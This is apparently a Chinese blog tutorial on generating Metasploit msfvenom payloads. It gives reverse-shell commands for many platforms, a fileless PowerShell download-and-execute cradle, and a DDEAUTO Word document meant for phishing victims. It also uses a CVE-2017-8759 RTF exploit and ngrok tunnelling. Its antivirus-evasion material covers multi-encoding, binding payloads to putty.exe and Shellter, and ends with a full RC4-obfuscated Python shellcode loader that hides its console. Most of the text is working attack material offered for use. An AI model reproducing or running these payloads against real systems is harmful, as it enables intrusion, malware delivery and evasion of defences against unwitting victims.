zoukankan      html  css  js  c++  java
  • Metasploit msfvenom

    一、 msfvenom简介

      msfvenommsf payloadmsf encode的结合体,于201568日取代了msf payloadmsf encode。在此之后,metasploit-framework下面的msf payload(载荷生成器),msf encoder(编码器),msfcli(监听接口)都不在支持。

    二、msf venom参数

    -p,  -payload <payload>指定需要使用的payload(攻击载荷)。也可以使用自定义的payload,几乎是支持全平台的
    -l, -list [module_type] 列出指定模块的所有可用资源。模块类型包括:payloads,encoders,nops,all
    -n,-nopsled <length>为payload预先指定一个NOP滑动长度
    -f, -format <format>指定输出格式(使用--help-formats来获取msf支持的输出格式列表)
    -e, -encoder[encoder]指定需要使用的encoder(编码器),如果即没有-e选择也没用-b选项,则输出raw payload-a, -arch <architecture> 指定payload的目标架构,例如x86|x64|x86_64-plaform <platform>指定payload的目标平台
    -s, -space <length>设定有效攻击荷载的最大长度,就是文件大小
    -b, -bad-chars <list>设定规避字符集,指定需要过滤的坏字符例如:不使用'x0f''x00';-i, -iterations <count>指定payload的编码次数
    -c, -add-code <path> 指定一个自定义的可执行文件为模板,并将payload嵌入其中
    -k, -keep保护模板程序的动作,注入的payload作为一个新的进程运行
    -payload-options列举payload的标准选项
    -o, -out <path> 指定创建好的payload的存放位置
    -v, -var-name <name>指定一个自定义的变量,以确定输出格式
    -shellest 最小化生成payload
    -h, -help查看帮助选项
    -help-formats查看msf支持的输出格式列表

    查看所有payload

    root@kali:~/桌面# msfvenom --list payloads

     查看所有编码器

    root@kali:~/桌面# msfvenom --list encoders

    # 评级最高的两个encoder为cmd/powershell_base64和x86/shikata_ga_nai,其中x86/shikata_ga_nai也是免杀中使用频率最高的一个编码器

     查看windows/meterpreter/reverse_tcp支持什么平台、哪些选项,可以使用

    root@kali:~/桌面# msfvenom -p windows/meterpreter/reverse_tcp --list-options

    三、监听参数

    防止假session
    在实战中,经常会遇到假session或者刚连接就断开的情况,这里补充一些监听参数,防止假死与假session。
    msf exploit(multi/handler) > set ExitOnSession false   
    //可以在接收到seesion后继续监听端口,保持侦听。
    防止session意外退出
    msf5 exploit(multi/handler) > set SessionCommunicationTimeout 0  
    //默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0
    msf5 exploit(multi/handler) > set SessionExpirationTimeout 0 
    //默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关闭

    四、handler后台持续监听

    use exploit/multi/handler
    set PAYLOAD <Payload name>
    set LHOST 192.168.8.124
    set LPORT 1122
    set ExitOnSession false
    exploit -j -z
    
    
    msf exploit(multi/handler) > exploit -j -z
    使用exploit -j -z可在后台持续监听,-j为后台任务,-z为持续监听,使用Jobs命令查看和管理后台任务。jobs -K可结束所有任务。
    还有种比较快捷的建立监听的方式,在msf下直接执行:
    msf5 > handler -H 192.168.244.128 -P 1122 -p windows/meterpreter/reverse_tcp

     

    五、payload的可持续化

    一般来说使用msfvenom生成的payload会单独开启一个进程,这种进程很容易被发现和关闭,在后期想做持久化的时候只能再使用migrate进行。 其实在生成payload时可直接使用如下命令,生成的payload会直接注入到指定进程中。

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -b "x00" -i 5 -a x86 --platform win PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe 

    生成的shell程序执行后会启动两个进程shell.exe和svchost.exe,关闭其中一个不会影响会话状态。 在上面的生成payload参数中: (1)PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到svchost.exe进程,自己测试的时候不建议到这个进程而是其他的持久进程。 (2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下。

     把生成的shell.exe(此文件不免杀) 复制到windows 2003靶机中双击运行

     

     

    六、各平台payload生成

    6.1 Linux

    (1)设置监听

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
    payload => linux/x64/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > show options

    msf5 exploit(multi/handler) > set lhost 192.168.244.128
    lhost => 192.168.244.128
    msf5 exploit(multi/handler) > set lport 1123
    lport => 1123
    msf5 exploit(multi/handler) > run

    (2)生成Linux payload

    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1123 -f elf > shell.elf

     

    (3)执行shell.elf

    root@kali:~# ls -larth shell.elf 
    -rw-r--r-- 1 root root 250 6月  13 20:47 shell.elf
    root@kali:~# chmod +x shell.elf 
    root@kali:~# ./shell.elf 

     (4) 查看sessions

    6.2 Windows

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f exe > shell.exe

    6.3 Mac

    msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

    6.4 Android

    msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -f raw > shell.apk
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 R > test.apk

    七、生成脚本payload

    7.1 powershell

    msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1

    7.2 nc正向连接

    msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.244.128 LPORT=1122  -f exe> 1.exe

    7.3 nc反向连接,监听

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.244.128 LPORT=1122  -f exe> 1.exe

    7.4 PHP

    kali监听会话、把shell.php上传至目标网站访问就可以建立会话了

    (1)建立监听

    msf5 exploit(multi/handler) >  use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.244.128
    lhost => 192.168.244.128
    msf5 exploit(multi/handler) > set lport 1124
    lport => 1124
    msf5 exploit(multi/handler) > run

    (2)生成payload

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1124 -f raw > shell.php

    (3)把shell.php上传至目标网站

     (4)浏览器访问shell.php

     

     (5)查看建立的session

    7.5 ASP

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

    7.6 JSP

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

    7.7 WAR

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

    7.8 powershell配置msf无文件攻击

    (1)生成ps脚本、把生成的脚本放到web站点下

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1125 -f psh-reflection >x.ps1

    (2)设置监听

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost 192.168.244.128 
    set lport 1125 run

    (3)客户端运行

    powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.244.129/x.ps1')

    (4)查看会话

     7.9 powershell配置word伪装木马

    监听、生成payload操作和7.8操作一致

    (1)新建一个word文档——插入——文档部件——域

     

     

     

    DDEAUTO C:\windows\system32\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.244.129/x.ps1') " 

    (3)通过钓鱼、社工等方式让其他人打开此word文档

    7.10 msf宏钓鱼

    git clone https://github.com/bhdresh/CVE-2017-8759.git
    cd CVE-2017-8759/
    python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.244.128/logo.txt
    # 生成如下图所示的文件

     生成payload

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1133 -f exe > /root/shell.exe
    python cve-2017-8759_toolkit.py -M exp -e http://192.168.244.128/shell.exe -l shell.exe

    开启监听

    msf5 >  use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.244.128
    lhost => 192.168.244.128
    msf5 exploit(multi/handler) > set lport 1133
    lport => 1133
    msf5 exploit(multi/handler) > run

    把Invoice.rtf 上传到Windows 7

     

     

     八、ngrok穿透内网

     http://www.ngrok.cc/

     

     

     

     

    unzip linux_amd64.zip
    cd linux_amd64
    ./sunny clientid xxxxid

     生成payload

    root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10929 -f exe > a.exe

    开启监听

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 127.0.0.1
    lhost => 127.0.0.1
    msf5 exploit(multi/handler) > set lport 10929
    lport => 10929
    msf5 exploit(multi/handler) > run

     Windows 7执行木马

     查看session

     

     九、msf5-Evasion免杀模块

    9.1 Defender免杀

    msf5 > use windows/windows_defender_exe
    msf5 evasion(windows/windows_defender_exe) > options
    msf5 evasion(windows/windows_defender_exe) > set filename ev.exe
    filename => ev.ext
    msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 evasion(windows/windows_defender_exe) > set lhost 192.168.244.128
    lhost => 192.168.244.128
    msf5 evasion(windows/windows_defender_exe) > set lport 1177
    lport => 1177
    msf5 evasion(windows/windows_defender_exe) > run

     设置监听

    handler -H 192.168.244.128 -P 1177 -p windows/meterpreter/reverse_tcp

     目前已经不免杀

    9.2 捆绑免杀 

    可以在此站检测木马  https://www.virustotal.com/gui/home/upload

    生成payload 捆绑putty.exe

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122  -x putty.exe  -f exe -o payload3.exe

    捆绑编码免杀

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=1122 -e x86/shikata_ga_nai -x putty.exe  -i 15 -f exe -o payload4.exe

    多重编码免杀

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.244.128 LPORT=1122 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > shell.exe

    十、shellter免杀

    shellcode代码注入工具

    https://www.shellterproject.com/download/

    vim /etc/apt/sources.list
    #中科大源
    deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
    deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
    apt-get update


    apt-get install shellter

    dpkg --add-architecture i386 && apt-get update && apt-get install wine32

    启动shellter

    root@kali:~# shellter

     

     开启监听

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.244.128
    lhost => 192.168.244.128
    msf5 exploit(multi/handler) > set lport 1155
    lport => 1155
    msf5 exploit(multi/handler) > run

    把putty.exe复制到window7中运行(运行最新版本的360)

     查看建立的session

     用360动态杀毒时(不免杀)

    十一、免杀python脚本

    root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=1155 LHOST=192.168.244.128 -e x86/shikata_ga_nai -i 17 -f py -o  /root/121.py

     修改生成的py文件(头部和尾部添加、如下所示)

    from ctypes import *
    import ctypes
    import sys, os, hashlib, time, base64
    
    def rc4(string, op='encode', public_key='ddd', expirytime=0):
        ckey_lenth = 4
        public_key = public_key and public_key or ''
        key = hashlib.md5(public_key).hexdigest()
        keya = hashlib.md5(key[0:16]).hexdigest()
        keyb = hashlib.md5(key[16:32]).hexdigest()
        keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or ''
        cryptkey = keya + hashlib.md5(keya + keyc).hexdigest()
        key_lenth = len(cryptkey)  # 64
        string = op == 'decode' and base64.b64decode(string[4:]) or '0000000000' + hashlib.md5(string + keyb).hexdigest()[0:16] + string
        string_lenth = len(string)
        result = ''
        box = list(range(256))
        randkey = []
        for i in xrange(255):
            randkey.append(ord(cryptkey[i % key_lenth]))
        for i in xrange(255):
            j = 0
            j = (j + box[i] + randkey[i]) % 256
            tmp = box[i]
            box[i] = box[j]
            box[j] = tmp
        for i in xrange(string_lenth):
            a = j = 0
            a = (a + 1) % 256
            j = (j + box[a]) % 256
            tmp = box[a]
            box[a] = box[j]
            box[j] = tmp
            result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
        if op == 'decode':
            if (result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5(
                    result[26:] + keyb).hexdigest()[0:16]:
                return result[26:]
            else:
                return None
        else:
            return keyc + base64.b64encode(result)
    
    
    buf =  b""
    buf += b"xb8x28xcex23x6cxdbxcaxd9x74x24xf4x5ax31"
    buf += b"xc9xb1xecx31x42x14x03x42x14x83xeaxfcxca"
    buf += b"x3bxf8xa6xb1x1ex60x6ex19x47xebxabx55x27"
    buf += b"x3dx7dx24x3dxbex92xbax8fx9ex7ax41xafx36"
    buf += b"x61x6ax0bxa1x03xb3x5fxd3x48x35x26xa9x11"
    buf += b"xa7x32x7dx80xe6xd1x66x9ax66xc4xcex49x58"
    buf += b"x57x8bx00x8cx91xdfxd7xecxe0x5fx72x48xc8"
    buf += b"xeexafx99x62x57xf0x56x40x7exc2xc2x8ex3b"
    buf += b"xbex0fx7dx5bx82xa3xd8x02xcfxf4xf7x15x32"
    buf += b"xb8xbcx0ax03xb8x34x22x2fx21x58x83x6bx8f"
    buf += b"xa0x32xdax92x9ax7ax0bxb8x42x82x09xe9x32"
    buf += b"x94x17xcbx5axeax8exdbxdax9fx86x17x6bxc8"
    buf += b"x95xf1xbcx1dx1cxbcx57x10xadx85x4ax35x3f"
    buf += b"xf8x01xc0xa4x35x5cxd8xb7xf5x2cxfdx2fxd8"
    buf += b"x57x21xe3x0dx0cx57xa1x0fxcbxfex18x5ax7f"
    buf += b"xa5xa6xc6x2ex61xadxc3x4cxb6xa1x03x47x83"
    buf += b"x03xd2x09xffx15xd3x38x12x40x94xddxaex5a"
    buf += b"x32x52x6cxa2xa8x18xddxd9x6bx3ex84x15x8f"
    buf += b"xe4x85x9ex3dxcaxeexa7xffx44x18xf9xcdx80"
    buf += b"x9axc5x0ax25xccxf1xcdx1fxf6xf4x45x16xbc"
    buf += b"x8cx96xdcx71x9bx35xafxafxa0xd3x57x0ax2e"
    buf += b"xb1x63xa6xfaxa4x11xa1x8dx87xc9xebx0ex85"
    buf += b"xa9x6dx9cx4bx60xd0xcbxf6x2bxa9xcfx36xef"
    buf += b"xa2x5fx98xa1x38xfdx86x74xabxd2x8bx4bxfd"
    buf += b"xd0xd7x7bx64x8bx34x3axadx19xcexbax88x33"
    buf += b"x92x59xb4xeax80x5ax6fx39xbbxe4xa9xbaxd4"
    buf += b"x3bx74xa0xc0x84xc8xb4xf0xcdx2ex30x05x96"
    buf += b"x87xd3x04xf6x69x4bxd0x88x00x83x4ax3bx1e"
    buf += b"x50x68x47x9fx12x81x84x49x18x88x78x34x28"
    buf += b"x13x49x37xd0xc2x6fx78x88xc5x30xbdx92x90"
    buf += b"x6dx96xa7xbdxecxefx91x1cx6bxb5xcax24x24"
    buf += b"x41x2axcex4fx7fx5ex82xc8xbcx8ax1cxd8x0a"
    buf += b"xe3xcfxb6x3ex12x72x4ex05xd0x40x59x82x05"
    buf += b"x32xbbx1axe4x0ax62x9axffx89xc6xcexaaxeb"
    buf += b"x04xaex95x65x19x3bx79x1exe7xe7x06x8exa7"
    buf += b"xa2x98x6cx6cxb7x01x66x13x09x60x78x39x3f"
    buf += b"x49x47x7cx55xbax57xd2x93xb5xccx6dx23xe2"
    buf += b"xd6xcbxd5x13x46x60x5bxafx49x7ax00xdcx78"
    buf += b"x58x6cx46x79xd8x3exdbx3fxd7x3fx08xf2x8b"
    buf += b"x2dx22x07x03x7dx88xfexc6xefxe4x95x4ax56"
    buf += b"xa0x81xf5x69xcax38x00x3fxa0x86x9axcaxd8"
    buf += b"x5fxe5x38x93xb0x1bx81x32x15xbcxbaxc3x9d"
    buf += b"xa7x85x9cx5bx93x42x63xc2xb6x4bx72xb7x7e"
    buf += b"xd8xb9x14xe7x5ax34x5axeexa9x8bx3dx13x84"
    buf += b"x18xf1xb3xdax05x27x95xb2x7fxdax67xf7x68"
    buf += b"x47x5cx0axe6x95x0fxbex39xeaxe5xf6x09x2a"
    buf += b"xe8x0cx93xb0xf3x79x03xd5x37xf1xcbxaex35"
    buf += b"x4cxd9x3axa7x74xf2x49xdbx25x30x08xc2x26"
    buf += b"x72x8bx40x30xd9x93x5cxeexbdxe1xd1x2dx03"
    buf += b"x05x16x11x74x2dxfex24x84x27x0fx8ex0dxd9"
    buf += b"x26x63x0cx45x86xa3x59x9dx3fxbfx53x21x67"
    buf += b"xbfxadx77xb0x38xf2x05x6cx51xcdxc7xfdx11"
    buf += b"xeexd6x07x01x82xf5x0cxb9xa8x40x0axb6x17"
    buf += b"x41xc9xa1x67x5ax7bx21x15x3fx5dxe1xe3x61"
    buf += b"x22xb5xbbxc9x91x8bxd7x62x34xf3x56x74x15"
    buf += b"xaexbfxc3xf3x53x0bxb3xefxc1x59x95x2bx54"
    buf += b"x8cx50x90xabxc8xa3x1bxaaxdaxddxd6x0exd6"
    buf += b"xbdx6dx7bx76x88x04x42x50xf0x9axe1x72x79"
    buf += b"xdbx8bx3bxb4x6bx8exd2x58xa4x1bx81xadx48"
    buf += b"x17xaax9cxe5x1fxc3x10xd8x82x42x7axb0x3b"
    buf += b"x29xb7xa9xf1xeex40x42xccxa8x8bx84xcex7c"
    buf += b"xd7x0dx34x08xb6xe5xafx27x84x5cx28x15xe1"
    buf += b"x46x7cxb0xa8x7axc3x77x12x7axdaxb3xc8x5f"
    buf += b"x29x08x82x05xf9xe4xb3xcdxf6x41x5fx55x9b"
    buf += b"x9ax5dx6ax69x1bx51x0cx77xf5xc1x79x1bx1e"
    buf += b"xd8xd3x24x41xeex4fx1cx5cxefx77xf2x68x71"
    buf += b"x49x51xfcx27x5ex55x35xdfx4fx9ex8dxe5xf9"
    buf += b"x3ex7dxc7x58x99xc0xe2xdaxe7xadx85xf1xb3"
    buf += b"x34xc9xc4x48x26x4fx9ex66xf1xcbx68x82xf7"
    buf += b"xe6x96x43x9ax0cxe4x0ex36x81xdex7dxa9x54"
    buf += b"xcexa2xf5xfcxccx89x0dx01x5cxf2xbex99xc2"
    buf += b"xe3x68x12x3dxb0x76xfexd6x1cxd1x57xa7xa8"
    buf += b"xa2xfcx4ax65x75xa2xd1xa4xbexd9x98x03x37"
    buf += b"xaexafx82x2ax55x57xe9x70x9bx3bx07x44x6b"
    buf += b"x47xb7x42x41x10x01x25"
    
    
    
    buf=rc4(buf,'encode','6666666666666')
    
    # libc = CDLL('libc.so.6')
    PROT_READ = 1
    PROT_WRITE = 2
    PROT_EXEC = 4
    def executable_code(buffer):
        buf = c_char_p(buffer)
        size = len(buffer)
        addr = libc.valloc(size)
        addr = c_void_p(addr)
        if 0 == addr:
            raise Exception("Failed to allocate memory")
        memmove(addr, buf, size)
        if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
            raise Exception("Failed to set protection on buffer")
        return addr
    
    VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
    VirtualProtect = ctypes.windll.kernel32.VirtualProtect
    shellcode = bytearray(rc4(buf, 'decode', '6666666666666'))
    whnd = ctypes.windll.kernel32.GetConsoleWindow()
    if whnd != 0:
        if 666 == 666:
            ctypes.windll.user32.ShowWindow(whnd, 0)
            ctypes.windll.kernel32.CloseHandle(whnd)
    memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                                          ctypes.c_int(len(shellcode)),
                                                          ctypes.c_int(0x3000),
                                                          ctypes.c_int(0x40))
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    old = ctypes.c_long(1)
    VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old))
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                         buf,
                                         ctypes.c_int(len(shellcode)))
    shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
    shell()
    121.py

    安装pyinstaller 打包exe

    pip install pywin32
    pip install pyinstaller

    打包exe并执行此exe文件

    C:Python27>pyinstaller -F 121.py

    十二、venom秒杀payload

    git clone https://github.com/r00t-3xp10it/venom
    sudo ./setup.sh
    sudo ./venom.sh
  • 相关阅读:
    Saltstack module gem 详解
    Saltstack module freezer 详解
    Saltstack module firewalld 详解
    Saltstack module file 详解
    Saltstack module event 详解
    Saltstack module etcd 详解
    Saltstack module environ 详解
    Saltstack module drbd 详解
    Saltstack module dnsutil 详解
    获取主页_剥离百度
  • 原文地址:https://www.cnblogs.com/hwlong/p/8644275.html
Copyright © 2011-2022 走看看